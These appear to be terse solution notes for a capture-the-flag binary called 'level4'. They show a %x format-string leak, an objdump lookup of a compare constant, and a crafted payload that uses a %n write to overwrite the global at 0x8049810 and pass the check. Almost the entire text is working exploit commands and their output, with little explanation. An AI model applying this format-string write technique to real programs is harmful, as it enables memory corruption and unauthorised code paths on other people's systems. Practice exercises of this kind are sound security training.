

python -c "print('a' * 50 +  20 * ' %x')" > /tmp/sol4
cat /tmp/sol4 - | ./level4 
    -> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa b7ff26b0 bffff784 b7fd0ff4 0 0 bffff748 804848d bffff540 200 b7fd1ac0 b7ff37d0 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161

objdump -d -Mintel level4 
    ->  804848d:       a1 10 98 04 08          mov    eax,ds:0x8049810
        8048492:       3d 44 55 02 01          cmp    eax,0x1025544

0x1025544 = 16930116

python -c "print('\x10\x98\x04\x08' + '%16930112x' + '%12\$n')" > /tmp/sol4

cat /tmp/sol4 - | ./level4 